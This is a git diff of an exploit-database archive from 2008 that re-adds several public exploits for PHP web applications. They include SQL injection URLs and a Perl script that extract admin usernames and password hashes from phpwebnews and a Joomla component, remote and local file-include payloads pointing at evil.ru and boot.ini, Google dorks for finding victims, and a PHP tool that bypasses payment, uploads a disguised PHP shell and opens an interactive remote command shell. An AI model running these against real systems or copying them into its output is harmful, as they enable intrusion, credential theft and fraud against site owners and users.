-http://www.codewalkers.com/codefiles/476_phpwebnews-mysql.zip
- =================================================================================
-expl0it:
-http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*
- =================================================================================
-Young Iranian h4ck3rz
-=================================================================================
-
-# milw0rm.com [2008-07-03]
+#######################################################################################
+#                                                                                                                                                                 
+#        ...:::::phpwebnews-mysql 0.2  SQL Injection Vulnerability ::::....                                           
+#                                                                                                                                                                 
+#######################################################################################
+
+Virangar Security Team
+
+www.virangar.net
+www.virangar.ir
+=================================================================================
+Discoverd By :virangar security team
+
+User In Virangar : d4v00d_cr4ck3r
+=================================================================================
+Special TNX To:Mr.nosrati,H4di.H4di,black.shadowes,Mr.hesy,Zahra
+
+& All virangar Members & All hackerz
+ =================================================================================
+Download:
+http://www.codewalkers.com/codefiles/476_phpwebnews-mysql.zip
+ =================================================================================
+expl0it:
+http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*
+ =================================================================================
+Young Iranian h4ck3rz
+=================================================================================
+
+# milw0rm.com [2008-07-03]
diff --git a/platforms/php/webapps/6001.txt b/platforms/php/webapps/6001.txt
index 3a1905d1b..2ff232bd8 100755
--- a/platforms/php/webapps/6001.txt
+++ b/platforms/php/webapps/6001.txt
@@ -1,336 +1,336 @@
-Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-027
-
-
-Application:                    1024 CMS
-Versions Affected:              1.4.3, 1.4.4 RFC
-Vendor URL:                     http://www.1024cms.com/
-Bug:                            Multiple Remote/Local File Include
-Exploits:                       YES
-Reported:                       18.06.2008
-Second report:                  27.06.2008
-Vendor Response:                NONE
-Solution:                       NONE
-Date of Public Advisory:        04.07.2008
-Author:                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
-
-
-
-Description
-***********
-
-
-1024 CMS has Remote File Include vulnerability  and multiple Local File Include vulnerabilities. 
-
-
-1. Remote/Local File Include vulnerabilities found in scripts: 
-
-themes/blog/layouts/standard.php
-themes/default/layouts/standard.php
-themes/portfolio/layouts/standard.php
-themes/snazzy/layouts/standard.php
-
-Code
-****
-#################################################
-
-
-
    
-        
-
-#################################################
-
-Example:
-
-http://[server]/[installdir]/themes/blog/layouts/standard.php?page_include=http://evil.ru/evil.php
-http://[server]/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
-http://[server]/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00
-
-
-
-
-
-Multiple Local File Include vulnerabilities:
-
-
-
-
-2. Local File Include vulnerability found in script admin/lang/fr/reports/default.php
-
-Code
-****
-#################################################
-
-if(isset($_GET['t'])) {
-        switch($_GET['t']) {
-                case "forum":
-                include("../admin/lang/".$lang."/reports/ops/forum.php");
-                break;
-                
-                case "download":
-                include("../admin/lang/".$lang."/reports/ops/download.php");
-                break;
-
-                case "news":
-                include("../admin/lang/".$lang."/reports/ops/news.php");
-                break;
-        }
-} else die("You cannot access this page directly");
-
-#################################################
-
-Example:
-
-http://[server]/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
-
-
-3. Local File Include vulnerabilities found in scripts:
-
-admin/ops/admins/default.php
-admin/ops/reports/ops/download.php
-admin/ops/reports/ops/forum.php
-admin/ops/reports/ops/news.php
-
-Code
-****
-#################################################
-
-
-...
-
-#################################################
-
-Example:
-
-http://[server]/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
-
-
-9. Local File Include vulnerabilities found in scripts:
-
-themes/blog/layouts/basic_header.php
-themes/default/layouts/basic_header.php
-themes/portfolio/layouts/basic_header.php
-themes/snazzy/layouts/basic_header.php
-
-Code
-****
-#################################################
-
-...
-
    
-        
-
-#################################################
-
-Example:
-
-http://[server]/[installdir]/themes/default/layouts/total.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
-http://[server]/[installdir]/themes/snazzy/layouts/total.php?page=../../../../../../../../../../../../../boot.ini%00
-
-
-
-About
-*****
-
-Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
-
-
-Contact:    research [at] dsec [dot] ru
-            http://www.dsec.ru (in Russian)
-
-# milw0rm.com [2008-07-04]
+Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-027
+
+
+Application:                    1024 CMS
+Versions Affected:              1.4.3, 1.4.4 RFC
+Vendor URL:                     http://www.1024cms.com/
+Bug:                            Multiple Remote/Local File Include
+Exploits:                       YES
+Reported:                       18.06.2008
+Second report:                  27.06.2008
+Vendor Response:                NONE
+Solution:                       NONE
+Date of Public Advisory:        04.07.2008
+Author:                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
+
+
+
+Description
+***********
+
+
+1024 CMS has Remote File Include vulnerability  and multiple Local File Include vulnerabilities. 
+
+
+1. Remote/Local File Include vulnerabilities found in scripts: 
+
+themes/blog/layouts/standard.php
+themes/default/layouts/standard.php
+themes/portfolio/layouts/standard.php
+themes/snazzy/layouts/standard.php
+
+Code
+****
+#################################################
+
+
+
    
+        
+
+#################################################
+
+Example:
+
+http://[server]/[installdir]/themes/blog/layouts/standard.php?page_include=http://evil.ru/evil.php
+http://[server]/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
+http://[server]/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00
+
+
+
+
+
+Multiple Local File Include vulnerabilities:
+
+
+
+
+2. Local File Include vulnerability found in script admin/lang/fr/reports/default.php
+
+Code
+****
+#################################################
+
+if(isset($_GET['t'])) {
+        switch($_GET['t']) {
+                case "forum":
+                include("../admin/lang/".$lang."/reports/ops/forum.php");
+                break;
+                
+                case "download":
+                include("../admin/lang/".$lang."/reports/ops/download.php");
+                break;
+
+                case "news":
+                include("../admin/lang/".$lang."/reports/ops/news.php");
+                break;
+        }
+} else die("You cannot access this page directly");
+
+#################################################
+
+Example:
+
+http://[server]/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
+
+
+3. Local File Include vulnerabilities found in scripts:
+
+admin/ops/admins/default.php
+admin/ops/reports/ops/download.php
+admin/ops/reports/ops/forum.php
+admin/ops/reports/ops/news.php
+
+Code
+****
+#################################################
+
+
+...
+
+#################################################
+
+Example:
+
+http://[server]/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
+
+
+9. Local File Include vulnerabilities found in scripts:
+
+themes/blog/layouts/basic_header.php
+themes/default/layouts/basic_header.php
+themes/portfolio/layouts/basic_header.php
+themes/snazzy/layouts/basic_header.php
+
+Code
+****
+#################################################
+
+...
+
    
+        
+
+#################################################
+
+Example:
+
+http://[server]/[installdir]/themes/default/layouts/total.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
+http://[server]/[installdir]/themes/snazzy/layouts/total.php?page=../../../../../../../../../../../../../boot.ini%00
+
+
+
+About
+*****
+
+Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
+
+
+Contact:    research [at] dsec [dot] ru
+            http://www.dsec.ru (in Russian)
+
+# milw0rm.com [2008-07-04]
diff --git a/platforms/php/webapps/6002.pl b/platforms/php/webapps/6002.pl
index 05da737a2..e8bee6969 100755
--- a/platforms/php/webapps/6002.pl
+++ b/platforms/php/webapps/6002.pl
@@ -1,65 +1,65 @@
-#!/usr/bin/perl -w
-
-#   Joomla Component altas  v 1.0  Multiple Remote SQL Injection
-#  variables vuln : ( ano )  & ( mes ) 
-
-#[*] Found by : Houssamix From H-T Team 
-
-#[*] H-T Team [ HouSSaMix + ToXiC350 ] 
-#[*] Greetz :  Islamic Security Team  &  and all musulmans hackers
-
-#[*] Component_Name:   altas
-#[*] Script_Name: Joomla
-#[*] Dork : index.php?option=com_altas
-
-# altas
-# 10/09/2007
-# Ilimitada Hosting Co.
-# (c) 2007
-# soporte@ilihost.com
-# www.ilihost.com
-# 1.0
-
-system("color f");
-print "\t\t========================================================\n\n";
-print "\t\t#                   Viva Islam    	                  #\n\n";
-print "\t\t========================================================\n\n";
-print "\t\t# Joomla Component altas v 1 multiple SQL Injection 	  #\n\n";
-print "\t\t========================================================\n\n";
-print "\t\t#       H-T Team [HouSSaMiX - ToXiC350]	          	  #\n\n";
-print "\t\t========================================================\n\n";
-
-use LWP::UserAgent;
-
-print "\nEnter your Target (http://site.com/joomla/): ";
-	chomp(my $target=);
-
-$uname="username";
-$magic="jos_users";
-
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$answer = $res->content;
-
-print "\n[+] The Target : ".$target."";
-
-if ($answer =~ /(.*?)/){
-       
-		print "\n[+] Admin User : $1";
-}
-$host2 = $target . "index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--";
-$res2 = $b->request(HTTP::Request->new(GET=>$host2));
-$answer = $res2->content;
-if ($answer =~/([0-9a-fA-F]{32})/){
-		print "\n[+] Admin Hash : $1\n\n";
-		print "#   Exploit succeed!  #\n\n";
-}
-else{print "\n[-] Exploit Failed...\n";
-}
-
-# coded  by Houssamix From H-T Team
-
-# milw0rm.com [2008-07-04]
+#!/usr/bin/perl -w
+
+#   Joomla Component altas  v 1.0  Multiple Remote SQL Injection
+#  variables vuln : ( ano )  & ( mes ) 
+
+#[*] Found by : Houssamix From H-T Team 
+
+#[*] H-T Team [ HouSSaMix + ToXiC350 ] 
+#[*] Greetz :  Islamic Security Team  &  and all musulmans hackers
+
+#[*] Component_Name:   altas
+#[*] Script_Name: Joomla
+#[*] Dork : index.php?option=com_altas
+
+# altas
+# 10/09/2007
+# Ilimitada Hosting Co.
+# (c) 2007
+# soporte@ilihost.com
+# www.ilihost.com
+# 1.0
+
+system("color f");
+print "\t\t========================================================\n\n";
+print "\t\t#                   Viva Islam    	                  #\n\n";
+print "\t\t========================================================\n\n";
+print "\t\t# Joomla Component altas v 1 multiple SQL Injection 	  #\n\n";
+print "\t\t========================================================\n\n";
+print "\t\t#       H-T Team [HouSSaMiX - ToXiC350]	          	  #\n\n";
+print "\t\t========================================================\n\n";
+
+use LWP::UserAgent;
+
+print "\nEnter your Target (http://site.com/joomla/): ";
+	chomp(my $target=);
+
+$uname="username";
+$magic="jos_users";
+
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content;
+
+print "\n[+] The Target : ".$target."";
+
+if ($answer =~ /(.*?)/){
+       
+		print "\n[+] Admin User : $1";
+}
+$host2 = $target . "index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--";
+$res2 = $b->request(HTTP::Request->new(GET=>$host2));
+$answer = $res2->content;
+if ($answer =~/([0-9a-fA-F]{32})/){
+		print "\n[+] Admin Hash : $1\n\n";
+		print "#   Exploit succeed!  #\n\n";
+}
+else{print "\n[-] Exploit Failed...\n";
+}
+
+# coded  by Houssamix From H-T Team
+
+# milw0rm.com [2008-07-04]
diff --git a/platforms/php/webapps/6003.txt b/platforms/php/webapps/6003.txt
index 702b34c49..f0e61708a 100755
--- a/platforms/php/webapps/6003.txt
+++ b/platforms/php/webapps/6003.txt
@@ -1,32 +1,32 @@
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@JOOmla com_dbquery Remote file Inclusion@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-@@@@@@@@@@@@@@@@@
-@@@@@@@@@@@@@@@@@
-@@@@@@@@@@@@@@@@@ 			Author:SsEs 				  
-@@@@@@@@@@@@@@@@@
-@@@@@@@@@@@@@@@@@ 			Contact:h4cks.in@gmail.com		  
-@@@@@@@@@@@@@@@@@ 		Greetss: www.h4cks.in ||| www.1919turk.org || www.illegalsecurity.us ||| www.siberaskerler.org ||
-@@@@@@@@@@@@@@@@@
-@@@@@@@@@@@@@@@@@ Dork: inurl:"com_dbquery" OR "index.php?option=com_dbquery"
-@@@@@@@@@@@@@@@@@ **Bug:
-@@@@@@@@@@@@@@@@@ administrator\components\com_dbquery\classes\DBQ\admin\common.class.php on line 6
-@@@@@@@@@@@@@@@@@ global $mosConfig_absolute_path;
-@@@@@@@@@@@@@@@@@
-@@@@@@@@@@@@@@@@@ require_once($mosConfig_absolute_path.’/components/com_dbquery/classes/DBQ/common.class.php’);
-@@@@@@@@@@@@@@@@@
-@@@@@@@@@@@@@@@@@ http://sitename.com/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=
-@@@@@@@@@@@@@@@@@
-
-side note:
-	DBQuery
-	February 2007
-	Green Mountain Information Technology Consulting
-	This component is released under the GNU/GPL License
-	consulting@gmitc.biz
-
-	http://www.gmitc.biz
-	1.4.1 Final
-	Database Query is a Joomla query manager.
-
-# milw0rm.com [2008-07-04]
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@JOOmla com_dbquery Remote file Inclusion@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@@@@@@@@@@@@@@@@@
+@@@@@@@@@@@@@@@@@
+@@@@@@@@@@@@@@@@@ 			Author:SsEs 				  
+@@@@@@@@@@@@@@@@@
+@@@@@@@@@@@@@@@@@ 			Contact:h4cks.in@gmail.com		  
+@@@@@@@@@@@@@@@@@ 		Greetss: www.h4cks.in ||| www.1919turk.org || www.illegalsecurity.us ||| www.siberaskerler.org ||
+@@@@@@@@@@@@@@@@@
+@@@@@@@@@@@@@@@@@ Dork: inurl:"com_dbquery" OR "index.php?option=com_dbquery"
+@@@@@@@@@@@@@@@@@ **Bug:
+@@@@@@@@@@@@@@@@@ administrator\components\com_dbquery\classes\DBQ\admin\common.class.php on line 6
+@@@@@@@@@@@@@@@@@ global $mosConfig_absolute_path;
+@@@@@@@@@@@@@@@@@
+@@@@@@@@@@@@@@@@@ require_once($mosConfig_absolute_path.’/components/com_dbquery/classes/DBQ/common.class.php’);
+@@@@@@@@@@@@@@@@@
+@@@@@@@@@@@@@@@@@ http://sitename.com/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=
+@@@@@@@@@@@@@@@@@
+
+side note:
+	DBQuery
+	February 2007
+	Green Mountain Information Technology Consulting
+	This component is released under the GNU/GPL License
+	consulting@gmitc.biz
+
+	http://www.gmitc.biz
+	1.4.1 Final
+	Database Query is a Joomla query manager.
+
+# milw0rm.com [2008-07-04]
diff --git a/platforms/php/webapps/6006.php b/platforms/php/webapps/6006.php
index b22e77af1..af4ddde33 100755
--- a/platforms/php/webapps/6006.php
+++ b/platforms/php/webapps/6006.php
@@ -1,812 +1,812 @@
-#!/usr/bin/php
-                         |
-|          URL: http://blackh.free.fr - http://blackh.eu               |
-========================================================================
-| \$system> $argv[0] -url <> -a <1,2,3> -n <> -f <>                   |
-| Notes: -url       ex: http://victim.com/site/                        |
-|         -a        1 : Validate Command without Payment               |
-|                           -n Commmand number (ex: CDE5627JOC )       |
-|                   2 : Remote Code Execution                          |
-|                           -n Rubrique id  (ex: 1 )                   |
-|                   3 : Remote File Upload                             |
-|                           -n Rubrique id  (ex: 1 )                   |
-|                           -f Name of file (ex: leet.php )            |
-| For 2 and 3, the '/client/' directory  must not be forbidden         |
-========================================================================
-";exit(1);
-}
-
-$url = getparam('url',1);
-$action = getparam('a',1);
-$n = getparam('n',1);
-$f = getparam('f',0);
-
-$xpl = new phpsploit();
-$xpl->agent("Mozilla Firefox");
-
-switch($action) {
-
-	case '1':
-		valid_command($n);
-	break;
-	case '2':
-		remote_exec($n);
-	break;	
-	case '3':
-		remote_upload($n, $f);
-	break;
-	default:
-		die('Please choose an action.');
-	break;
-
-}
-
-# Validate Command without Payment
-function valid_command($n) {
-	global $xpl, $url;
-	
-	echo "\n[-] Change command statut";
-	echo "\n[-] Command: ".$n;
-	
-	
-		 if($xpl->post($url.'admin/commande_details.php?ref='.$n, 'ref='.$n.'&statutch=2'))	
-				die("\n[!] Done - Command is now 'paid' :))\n");	
-		else die("\n[!] Error - Maybe the code isn't good\n");
-	
-	exit(1);
-}
-
-# Remote Code Execution Exploit
-function remote_exec($n) {
-	global $xpl, $url;
-	
-	echo "\n[-] Remote Code Execution";
-
-	if(is_forbidden($url)) die("\n[!] Error - The /client/ directory is forbidden\n");
-		
-	$code = '';
-	$form = array(frmdt_url => $url.'admin/photo_rubrique.php',
-                  'action' => 'ajouter',
-                  'rubid' => $n,
-                  'photo1' => array(frmdt_filename => 'tapz.php',
-                                      frmdt_type => 'image/jpeg',
-                                      frmdt_content => $code));
-
-	if($xpl->formdata($form)) echo "\n[!] Done - Start Shell";
-	else die("\n[!] Error - Maybe the id isn't good\n");
-
-	$get = $xpl->get($url.'client/gfx/photos/rubrique/');
-	$tmp = preg_match('#tapz_([0-9]*).php#', $get, $file);
-
-	print "\n\$> ";
-
-while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){
-    $xpl->addheader('SHELL',$cmd);
-    $xpl->get($url.'client/gfx/photos/rubrique/'.$file[0]);	
-    print $xpl->getcontent()."\n\$> ";
-}
-}
-
-# Remote File Upload
-function remote_upload($n, $f) {
-	global $xpl, $url;
-	
-	echo "\n[-] Remote File Upload";
-	
-	if(is_forbidden($url)) die("\n[!] Error - The /client/ directory is forbidden\n");
-
-	$code = file_get_contents($f);
-	$form = array(frmdt_url => $url.'admin/photo_rubrique.php',
-                  'action' => 'ajouter',
-                  'rubid' => $n,
-                  'photo1' => array(frmdt_filename => $f,
-                                      frmdt_type => 'image/jpeg',
-                                      frmdt_content => $code));
-	
-	if($xpl->formdata($form) && $code) echo "\n[!] Done - Now go on $url/client/gfx/photos/rubrique";
-	else die("\n[!] Error - Maybe the id isn't good\n");
-
-}
-
-function is_forbidden($url) {
-	global $xpl, $url;
-
-	$get = $xpl->get($url.'/client/');
-		if (preg_match('#Forbidden#i', $get)) return true;
-		else return false;
-}
-
-# GetParam, function from acid-root.new.fr
-function getparam($param,$opt='')
-{
-	global $argv;
-	foreach($argv as $value => $key)
-	{
-		if($key == '-'.$param) return $argv[$value+1];
-	}
-	if($opt) exit("\n#error -$param parameter required");
-	else return;
-}
-
-/*
- * 
- * Copyright (C) darkfig
- * 
- * This program is free software; you can redistribute it and/or 
- * modify it under the terms of the GNU General Public License 
- * as published by the Free Software Foundation; either version 2 
- * of the License, or (at your option) any later version. 
- * 
- * This program is distributed in the hope that it will be useful, 
- * but WITHOUT ANY WARRANTY; without even the implied warranty of 
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
- * GNU General Public License for more details. 
- * 
- * You should have received a copy of the GNU General Public License 
- * along with this program; if not, write to the Free Software 
- * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
- * 
- * TITLE:          PhpSploit Class
- * REQUIREMENTS:   PHP 4 / PHP 5
- * VERSION:        2.0
- * LICENSE:        GNU General Public License
- * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
- * FILENAME:       phpsploitclass.php
- *
- * CONTACT:        gmdarkfig@gmail.com (french / english)
- * GREETZ:         Sparah, Ddx39
- *
- * DESCRIPTION:
- * The phpsploit is a class implementing a web user agent.
- * You can add cookies, headers, use a proxy server with (or without) a
- * basic authentification. It supports the GET and the POST method. It can
- * also be used like a browser with the cookiejar() function (which allow
- * a server to add several cookies for the next requests) and the
- * allowredirection() function (which allow the script to follow all
- * redirections sent by the server). It can return the content (or the
- * headers) of the request. Others useful functions can be used for debugging.
- * A manual is actually in development but to know how to use it, you can
- * read the comments.
- *
- * CHANGELOG:
- *
- * [2007-06-10] (2.0)
- *  * Code: Code optimization
- *  * New: Compatible with PHP 4 by default
- *
- * [2007-01-24] (1.2)
- *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
- *  * New: multipart/form-data enctype is now supported 
- *
- * [2006-12-31] (1.1)
- *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
- *  * New: You can now call the getheader() / getcontent() function without parameters
- *
- * [2006-12-30] (1.0)
- *  * First version
- * 
- */
-
-class phpsploit
-{
-	var $proxyhost;
-	var $proxyport;
-	var $host;
-	var $path;
-	var $port;
-	var $method;
-	var $url;
-	var $packet;
-	var $proxyuser;
-	var $proxypass;
-	var $header;
-	var $cookie;
-	var $data;
-	var $boundary;
-	var $allowredirection;
-	var $last_redirection;
-	var $cookiejar;
-	var $recv;
-	var $cookie_str;
-	var $header_str;
-	var $server_content;
-	var $server_header;
-	
-
-	/**
-	 * This function is called by the
-	 * get()/post()/formdata() functions.
-	 * You don't have to call it, this is
-	 * the main function.
-	 *
-	 * @access private
-	 * @return string $this->recv ServerResponse
-	 * 
-	 */
-	function sock()
-	{
-		if(!empty($this->proxyhost) && !empty($this->proxyport))
-		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
-		else
-		   $socket = @fsockopen($this->host,$this->port);
-		
-		if(!$socket)
-		   die("Error: Host seems down");
-		
-		if($this->method=='get')
-		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
-		   
-		elseif($this->method=='post' or $this->method=='formdata')
-		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
-		   
-		else
-		   die("Error: Invalid method");
-		
-		if(!empty($this->proxyuser))
-		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
-		
-		if(!empty($this->header))
-		   $this->packet .= $this->showheader();
-		   
-		if(!empty($this->cookie))
-		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
-	
-		$this->packet .= 'Host: '.$this->host."\r\n";
-		$this->packet .= "Connection: Close\r\n";
-		
-		if($this->method=='post')
-		{
-			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data."\r\n";
-		}
-		elseif($this->method=='formdata')
-		{
-			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data;
-		}
-
-		$this->packet .= "\r\n";
-		$this->recv = '';
-
-		fputs($socket,$this->packet);
-
-		while(!feof($socket))
-		   $this->recv .= fgets($socket);
-
-		fclose($socket);
-
-		if($this->cookiejar)
-		   $this->getcookie();
-
-		if($this->allowredirection)
-		   return $this->getredirection();
-		else
-		   return $this->recv;
-	}
-	
-
-	/**
-	 * This function allows you to add several
-	 * cookies in the request.
-	 * 
-	 * @access  public
-	 * @param   string cookn CookieName
-	 * @param   string cookv CookieValue
-	 * @example $this->addcookie('name','value')
-	 * 
-	 */
-	function addcookie($cookn,$cookv)
-	{
-		if(!isset($this->cookie))
-		   $this->cookie = array();
-
-		$this->cookie[$cookn] = $cookv;
-	}
-
-
-	/**
-	 * This function allows you to add several
-	 * headers in the request.
-	 *
-	 * @access  public
-	 * @param   string headern HeaderName
-	 * @param   string headervalue Headervalue
-	 * @example $this->addheader('Client-IP', '128.5.2.3')
-	 * 
-	 */
-	function addheader($headern,$headervalue)
-	{
-		if(!isset($this->header))
-		   $this->header = array();
-		   
-		$this->header[$headern] = $headervalue;
-	}
-
-
-	/**
-	 * This function allows you to use an
-	 * http proxy server. Several methods
-	 * are supported.
-	 * 
-	 * @access  public
-	 * @param   string proxy ProxyHost
-	 * @param   integer proxyp ProxyPort
-	 * @example $this->proxy('localhost',8118)
-	 * @example $this->proxy('localhost:8118')
-	 * 
-	 */
-	function proxy($proxy,$proxyp='')
-	{
-		if(empty($proxyp))
-		{
-			$proxarr = explode(':',$proxy);
-			$this->proxyhost = $proxarr[0];
-			$this->proxyport = (int)$proxarr[1];
-		}
-		else 
-		{
-			$this->proxyhost = $proxy;
-			$this->proxyport = (int)$proxyp;
-		}
-
-		if($this->proxyport > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-
-	/**
-	 * This function allows you to use an
-	 * http proxy server which requires a
-	 * basic authentification. Several
-	 * methods are supported:
-	 *
-	 * @access  public
-	 * @param   string proxyauth ProxyUser
-	 * @param   string proxypass ProxyPass
-	 * @example $this->proxyauth('user','pwd')
-	 * @example $this->proxyauth('user:pwd');
-	 * 
-	 */
-	function proxyauth($proxyauth,$proxypass='')
-	{
-		if(empty($proxypass))
-		{
-			$posvirg = strpos($proxyauth,':');
-			$this->proxyuser = substr($proxyauth,0,$posvirg);
-			$this->proxypass = substr($proxyauth,$posvirg+1);
-		}
-		else
-		{
-			$this->proxyuser = $proxyauth;
-			$this->proxypass = $proxypass;
-		}
-	}
-
-
-	/**
-	 * This function allows you to set
-	 * the 'User-Agent' header.
-	 * 
-	 * @access  public
-	 * @param   string useragent Agent
-	 * @example $this->agent('Firefox')
-	 * 
-	 */
-	function agent($useragent)
-	{
-		$this->addheader('User-Agent',$useragent);
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->header_str Headers
-	 * @example $this->showheader()
-	 * 
-	 */
-	function showheader()
-	{
-		$this->header_str = '';
-		
-		if(!isset($this->header))
-		   return;
-		   
-		foreach($this->header as $name => $value)
-		   $this->header_str .= $name.': '.$value."\r\n";
-		   
-		return $this->header_str;
-	}
-
-	
-	/**
-	 * This function returns the cookies
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->cookie_str Cookies
-	 * @example $this->showcookie()
-	 * 
-	 */
-	function showcookie()
-	{
-		$this->cookie_str = '';
-		
-		if(!isset($this->cookie))
-		   return;
-		
-		foreach($this->cookie as $name => $value)
-		   $this->cookie_str .= $name.'='.$value.'; ';
-
-		return $this->cookie_str;
-	}
-
-
-	/**
-	 * This function returns the last
-	 * formed http request.
-	 * 
-	 * @access  public
-	 * @return  string $this->packet HttpPacket
-	 * @example $this->showlastrequest()
-	 * 
-	 */
-	function showlastrequest()
-	{
-		if(!isset($this->packet))
-		   return;
-		else
-		   return $this->packet;
-	}
-
-
-	/**
-	 * This function sends the formed
-	 * http packet with the GET method.
-	 * 
-	 * @access  public
-	 * @param   string url Url
-	 * @return  string $this->sock()
-	 * @example $this->get('localhost/index.php?var=x')
-	 * @example $this->get('http://localhost:88/tst.php')
-	 * 
-	 */
-	function get($url)
-	{
-		$this->target($url);
-		$this->method = 'get';
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function sends the formed
-	 * http packet with the POST method.
-	 *
-	 * @access  public
-	 * @param   string url  Url
-	 * @param   string data PostData
-	 * @return  string $this->sock()
-	 * @example $this->post('http://localhost/','helo=x')
-	 * 
-	 */	
-	function post($url,$data)
-	{
-		$this->target($url);
-		$this->method = 'post';
-		$this->data = $data;
-		return $this->sock();
-	}
-	
-
-	/**
-	 * This function sends the formed http
-	 * packet with the POST method using
-	 * the multipart/form-data enctype.
-	 * 
-	 * @access  public
-	 * @param   array array FormDataArray
-	 * @return  string $this->sock()
-	 * @example $formdata = array(
-	 *                      frmdt_url => 'http://localhost/upload.php',
-	 *                      frmdt_boundary => '123456', # Optional
-	 *                      'var' => 'example',
-	 *                      'file' => array(
-	 *                                frmdt_type => 'image/gif',  # Optional
-	 *                                frmdt_transfert => 'binary' # Optional
